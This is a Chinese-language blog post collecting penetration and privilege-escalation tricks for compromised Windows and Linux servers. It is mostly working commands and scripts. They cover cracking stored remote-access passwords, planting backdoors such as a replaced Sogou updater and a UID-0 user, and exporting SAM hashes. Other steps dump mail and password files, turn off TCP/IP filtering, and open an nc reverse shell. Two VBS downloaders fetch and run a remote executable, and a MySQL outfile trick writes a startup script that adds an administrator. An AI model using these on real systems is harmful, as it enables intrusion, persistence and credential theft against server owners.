各种渗透,提权的经验和技巧总结

 旁站路径问题:
 
1、读网站配置。
 
2、用以下VBS:
 
On Error Resume Next
 
If (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) Then
 
MsgBox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”,
4096, “Lilo”
 
WScript.Quit
 
End If
 
Set objservice = GetObject(“IIS://LocalHost/W3SVC”)
 
For Each obj3w In objservice
 
If IsNumeric(obj3w.Name) Then
 
Set OService = GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)
 
Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
 
If Err <> 0 Then WScript.Quit (1)
 
WScript.Echo Chr(10) & “[” & OService.ServerComment & “]”
 
For Each Binds In OService.ServerBindings
 
Web = “{ ” & Replace(Binds, “:”, ” } { “) & ” }”
 
WScript.Echo Replace(Split(Replace(Web, ” “, “”), “}{“)(2), “}”, “”)
 
Next
 
WScript.Echo “Path : ” & VDirObj.Path
 
End If
 
Next
 
3、iis_spy 列举(注:需要支持ASPX,反IISSPY的方法:将 activeds.dll,activeds.tlb 降权)。
 
4、得到目标站目录,不能直接跨的。可以通过“echo ^
 
防BT系统拦截技巧,可以使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,
用服务器安全工具一扫通通挂掉了。
 
VNC、Radmin、PcAnywhere 的提权方法:
 
首先利用 shell 读取 vnc 保存在注册表中的密文,然后再使用工具VNC4X破解。
 
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
 
Radmin 默认端口是4899,先获取密码和端口,如下位置:
 
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默认密码注册表位置
 
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
 
然后用HASH版连接。
 
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有 PcAnywhere 同时保存密码文件的目录是允许我们的IUSER权限
访问,我们可以下载这个CIF文件到本地破解,再通过 PcAnywhere 从本机登陆服务器。
 
保存密码的CIF文件,不是位于PcAnywhere的安装目录,而且位于安装PcAnywhere所安装盘的:
 
“\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”
 
如果PcAnywhere安装在“D:\program\”文件夹下,那么PcAnywhere的密码文件就保存在:“D:\Documents and Settings
\All Users\Application Data\Symantec\pcAnywhere\”文件夹下。
 
搜狗输入法 PinyinUp.exe 提权:
 
搜狗输入法的“PinyinUp.exe”是可读可写的直接替换即可,位于搜狗安装目录下,例如:
 
“C:\Program Files\SogouInput\5.0.0.3819\PinyinUp.exe”
 
搜狗拼音输入法,会定时调用这个文件进行升级,禁止还禁止不掉,呵呵,天然的后门。
 
WinWebMail 提权加用户:
 
WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式,接下来,看路径,访问
“路径\web”传 shell,访问shell后,权限是system,直接放远控进启动项,等待下次重启。
 
没有删cmd组件的可以直接加用户,7i24的web目录也是可写,权限为administrator。
 
1433 SA权限构建注入点:
liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:
 
1.cat /etc/nsswitch
 看看密码登录策略我们可以看到使用了file ldap模式
 
2.less /etc/ldap.conf
 base ou=People,dc=unix-center,dc=net
 找到ou,dc,dc设置
 
3.查找管理员信息
 
匿名方式
 ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-
center,dc=net” -h 192.168.2.2
 
有密码形式
 ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b
“cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2
 
4.查找10条用户记录
 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
 
实战:
 1.cat /etc/nsswitch
 看看密码登录策略我们可以看到使用了file ldap模式
 
2.less /etc/ldap.conf
 base ou=People,dc=unix-center,dc=net
 找到ou,dc,dc设置
 
3.查找管理员信息
 
匿名方式
 ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-
center,dc=net” -h 192.168.2.2
 
有密码形式
 ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b
“cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2
 
4.查找10条用户记录
 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
 
渗透实战:
 1.返回所有的属性
 ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s sub “objectclass=*”
 version: 1
 dn: dc=ruc,dc=edu,dc=cn
 dc: ruc
 objectClass: domain
 
dn: uid=manager,dc=ruc,dc=edu,dc=cn
 uid: manager
 objectClass: inetOrgPerson
 objectClass: organizationalPerson
 objectClass: person
 objectClass: top
 sn: manager
 cn: manager
 
dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
 uid: superadmin
 objectClass: inetOrgPerson
 objectClass: organizationalPerson
 objectClass: person
 objectClass: top
 sn: superadmin
 cn: superadmin
 
dn: uid=admin,dc=ruc,dc=edu,dc=cn
 uid: admin
 objectClass: inetOrgPerson
 objectClass: organizationalPerson
 objectClass: person
 objectClass: top
 sn: admin
 cn: admin
 
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
 uid: dcp_anonymous
 objectClass: top
 objectClass: person
 objectClass: organizationalPerson
 objectClass: inetOrgPerson
 sn: dcp_anonymous
 cn: dcp_anonymous
 
2.查看基类
 bash-3.00# ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s base “objectclass=*” |
 
more
 version: 1
 dn: dc=ruc,dc=edu,dc=cn
 dc: ruc
 objectClass: domain
 
3.查找
 bash-3.00# ldapsearch -h 192.168.7.33 -b “” -s base “objectclass=*”
 version: 1
 dn:
 objectClass: top
 namingContexts: dc=ruc,dc=edu,dc=cn
 supportedExtension: 2.16.840.1.113730.3.5.7
 supportedExtension: 2.16.840.1.113730.3.5.8
 supportedSASLMechanisms: EXTERNAL
 supportedSASLMechanisms: DIGEST-MD5
 supportedLDAPVersion: 2
 supportedLDAPVersion: 3
 vendorName: Sun Microsystems, Inc.
 vendorVersion: Sun-Java(tm)-System-Directory/6.2
 dataversion: 020090516011411
 netscapemdsuffix: cn=ldap://dc=webA:389
 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
 
liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:
 
列举IP:showmount -e ip
 
liunx 相关提权渗透技巧总结,三、rsync渗透技巧:
 
1.查看rsync服务器上的列表:
 
rsync 210.51.X.X::
 finance
 img_finance
 auto
 img_auto
 html_cms
 img_cms
 ent_cms
 ent_img
 ceshi
 res_img
 res_img_c2
 chip
 chip_c2
 ent_icms
 games
 gamesimg
 media
 mediaimg
 fashion
 res-fashion
 res-fo
 taobao-home
 res-taobao-home
 house
 res-house
 res-home
 res-edu
 res-ent
 res-labs
 res-news
 res-phtv
 res-media
 home
 edu
 news
 res-book
 
看相应的下级目录(注意一定要在目录后面添加上/)
 
rsync 210.51.X.X::htdocs_app/
 rsync 210.51.X.X::auto/
 rsync 210.51.X.X::edu/
 
2.下载rsync服务器上的配置文件
 rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
 
3.向上更新rsync文件(成功上传,不会覆盖)
 rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
 http://app.finance.xxx.com/warn/nothack.txt
 
liunx 相关提权渗透技巧总结,四、squid渗透技巧:
 
nc -vv baidu.com 80
 GET HTTP://www.sina.com / HTTP/1.0
 GET HTTP://WWW.sina.com:22 / HTTP/1.0
 
liunx 相关提权渗透技巧总结,五、SSH端口转发:
 
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
 
liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:
 
确定版本:
 
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-
15&catid=32:languages&Itemid=47
 
重新设置密码:
 
index.php?option=com_user&view=reset&layout=confirm
 
liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:
 
useradd -o -u 0 nothack
 
liunx 相关提权渗透技巧总结,八、freebsd本地提权:
 
[argp@julius ~]$ uname -rsi
 * freebsd 7.3-RELEASE GENERIC
 * [argp@julius ~]$ sysctl vfs.usermount
 * vfs.usermount: 1
 * [argp@julius ~]$ id
 * uid=1001(argp) gid=1001(argp) groups=1001(argp)
 * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
 * [argp@julius ~]$ ./nfs_mount_ex
 *
 calling nmount()
 
tar 文件夹打包:
 
1、tar打包:
 
tar -cvf /home/public_html/*.tar /home/public_html/–exclude=排除文件*.gif 排除目录 /xx/xx/*
 alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
 {
 注:
 关于tar的打包方式,linux不以扩展名来决定文件类型。
 若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压
 那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/–exclude= 排除文件*.gif 排除目录
/xx/xx/*
 }
 
提权先执行systeminfo
 token 漏洞补丁号 KB956572
 Churrasco kb952004
 命令行RAR打包~~·
 rar a -k -r -s -m3 c:\1.rar c:\folder
收集系统信息的脚本:
 
for window:
 
@echo off
 echo #########system info collection
 systeminfo
 ver
 hostname
 net user
 net localgroup
 net localgroup administrators
 net user guest
 net user administrator
 
echo #######at- with atq#####
 echo schtask /query
 
echo
 echo ####task-list#############
 tasklist /svc
 echo
 echo ####net-work infomation
 ipconfig/all
 route print
 arp -a
 netstat -anipconfig /displaydns
 echo
 echo #######service############
 sc query type= service state= all
 echo #######file-##############
 cd \
 tree -F
 for linux:
 
#!/bin/bash
 
echo #######geting sysinfo####
 echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
 echo #######basic infomation##
 cat /proc/meminfo
 echo
 cat /proc/cpuinfo
 echo
 rpm -qa 2>/dev/null
 ######stole the mail……######
 cp -a /var/mail /tmp/getmail 2>/dev/null
 
echo ‘u’r id is’ `id`
 echo ###atq&crontab#####
 atq
 crontab -l
 echo #####about var#####
 set
 
echo #####about network###
 ####this is then point in pentest,but i am a new bird,so u need to add some in it
 cat /etc/hosts
 hostname
 ipconfig -a
 arp -v
 echo ########user####
 cat /etc/passwd|grep -i sh
 
echo ######service####
 chkconfig –list
 
for i in {oracle,mysql,tomcat,samba,apache,ftp}
 cat /etc/passwd|grep -i $i
 done
 
locate passwd >/tmp/password 2>/dev/null
 sleep 5
 locate password >>/tmp/password 2>/dev/null
 sleep 5
 locate conf >/tmp/sysconfig 2>dev/null
 sleep 5
 locate config >>/tmp/sysconfig 2>/dev/null
 sleep 5
 
###maybe can use “tree /”###
 echo ##packing up#########
 tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
 rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
 
ethash 不免杀怎么获取本机 hash:
 
首先导出注册表:
 
Windows 2000:regedit /e d:\aa.reg “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”
 
Windows 2003:reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” d:\aa.reg
 
注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system
权限可以忽略)。
 
接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了
 hash 抓完了记得把自己的账户密码改过来哦!
当 GetHashes 获取不到 hash 时,可以用冰刃把 sam 复制到桌面。据我所知,某人是用这个方法虚拟机多次因为不知道密
码而进不去!~
 
vbs 下载者:
 
1:
 echo Set sGet = createObject(“ADODB.Stream”) >>c:\windows\cftmon.vbs
 echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
 echo sGet.Type = 1 >>c:\windows\cftmon.vbs
 echo sGet.Open() >>c:\windows\cftmon.vbs
 echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
 echo sGet.SaveToFile “c:\windows\e.exe”,2 >>c:\windows\cftmon.vbs
 echo Set objShell = CreateObject(“Wscript.Shell”) >>c:\windows\cftmon.vbs
 echo objshell.run “””c:\windows\e.exe””” >>c:\windows\cftmon.vbs
 cftmon.vbs
 
2:
 On Error Resume Next:Dim iRemote,iLocal,s1,s2
 iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
 s1=”Mi”+”cro”+”soft”+”.”+”XML”+”HTTP”:s2=”ADO”+”DB”+”.”+”Stream”
 Set xPost = CreateObject(s1):xPost.Open “GET”,iRemote,0:xPost.Send()
 Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
 sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
 
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
 
create table a (cmd text):
 
insert into a values (“set wshshell=createobject (“”wscript.shell””)”);
 insert into a values (“a=wshshell.run (“”cmd.exe /c net user admin admin /add””,0)”);
 insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators admin /add””,0)”);
 select * from a into outfile “C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs“;
 
Cmd 下目录的操作技巧:
 
列出d的所有目录:
 for /d %i in (d:\freehost\*) do @echo %i
 
把当前路径下文件夹的名字只有1-3个字母的显示出来:
 for /d %i in (???) do @echo %i
 
以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
 for /r %i in (*.exe) do @echo %i
 
以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:
 for /r “f:\freehost\hmadesign\web\” %i in (*.*) do @echo %i
 
这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
 for /f %i in (c:\1.txt) do echo %i
 
delims=后的空格是分隔符,tokens是取第几个位置:
 for /f “tokens=2 delims= ” %i in (a.txt) do echo %i
 
Linux 系统下的一些常见路径:
 
/etc/passwd
 /etc/shadow
 /etc/fstab
 /etc/host.conf
 /etc/motd
 /etc/ld.so.conf
 /var/www/htdocs/index.php
 /var/www/conf/httpd.conf
 /var/www/htdocs/index.html
 /var/httpd/conf/php.ini
 /var/httpd/htdocs/index.php
 /var/httpd/conf/httpd.conf
 /var/httpd/htdocs/index.html
 /var/httpd/conf/php.ini
 /var/www/index.html
 /var/www/index.php
 /opt/www/conf/httpd.conf
 /opt/www/htdocs/index.php
 /opt/www/htdocs/index.html
 /usr/local/apache/htdocs/index.html
 /usr/local/apache/htdocs/index.php
 /usr/local/apache2/htdocs/index.html
 
Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):
 
c:\windows\php.ini
 c:\boot.ini
 c:\1.txt
 c:\a.txt
 
c:\CMailServer\config.ini
 c:\CMailServer\CMailServer.exe
 c:\CMailServer\WebMail\index.asp
 c:\program files\CMailServer\CMailServer.exe
 c:\program files\CMailServer\WebMail\index.asp
 C:\WinWebMail\SysInfo.ini
 C:\WinWebMail\Web\default.asp
 C:\WINDOWS\FreeHost32.dll
 C:\WINDOWS\7i24iislog4.exe
 C:\WINDOWS\7i24tool.exe
 
c:\hzhost\databases\url.asp
 
c:\hzhost\hzclient.exe
 C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
 
C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
 C:\WINDOWS\web.config
 c:\web\index.html
 c:\www\index.html
 c:\WWWROOT\index.html
 c:\website\index.html
 c:\web\index.asp
 c:\www\index.asp
 c:\wwwsite\index.asp
 c:\WWWROOT\index.asp
 c:\web\index.php
 c:\www\index.php
 c:\WWWROOT\index.php
 c:\WWWsite\index.php
 c:\web\default.html
 c:\www\default.html
 c:\WWWROOT\default.html
 c:\website\default.html
 c:\web\default.asp
 c:\www\default.asp
 c:\wwwsite\default.asp
 c:\WWWROOT\default.asp
 c:\web\default.php
 c:\www\default.php
 c:\WWWROOT\default.php
 c:\WWWsite\default.php
 C:\Inetpub\wwwroot\pagerror.gif
 c:\windows\notepad.exe
 c:\winnt\notepad.exe
 
各种网站的配置文件相对路径大全:
 
/config.php
 ../../config.php
 ../config.php
 ../../../config.php
 /config.inc.php
 ./config.inc.php
 ../../config.inc.php
 ../config.inc.php
 ../../../config.inc.php
 /conn.php
 ./conn.php
 ../../conn.php
 ../conn.php
 ../../../conn.php
 /conn.asp
 ./conn.asp
 ../../conn.asp
 ../conn.asp
 ../../../conn.asp
 /config.inc.php
 ../inc/conn.asp
 ../../../inc/conn.asp
 /inc/config.inc.php
 ./inc/config.inc.php
 ../../inc/config.inc.php
 ../inc/config.inc.php
 ../../../inc/config.inc.php
 /index.php
 ./index.php
 ../../index.php
 ../index.php
 ../../../index.php
 /index.asp
 ./index.asp
 ../../index.asp
 ../index.asp
 ../../../index.asp
 
去除TCP IP筛选:
 
TCP/IP筛选在注册表里有三处,分别是:
 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
 
分别用以下命令来导出注册表项:
 regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
 regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
 regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
然后再把三个文件里的:
 
“EnableSecurityFilters”=dword:00000001”
 
改为:
 
“EnableSecurityFilters”=dword:00000000”
 
再将以上三个文件分别用以下命令导入注册表即可:
 regedit -s D:\a.reg
 regedit -s D:\b.reg
 regedit -s D:\c.reg
Webshell 提权小技巧:
 
Cmd路径:c:\windows\temp\cmd.exe
 
Nc 也在同目录下,例如反弹cmdshell:
 
“c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe”
 
通常都不会成功。
 
而直接在 cmd 路径上输入:c:\windows\temp\nc.exe
 
命令输入:-vv ip 999 -e c:\windows\temp\cmd.exe
 
却能成功。。这个不是重点
 我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。
 
命令行调用 RAR 打包:
 
rar a -k -r -s -m3 c:\1.rar c:\folder

各种渗透,提权的经验和技巧总结:等您发表观点!

发表评论


快捷键:Ctrl+Enter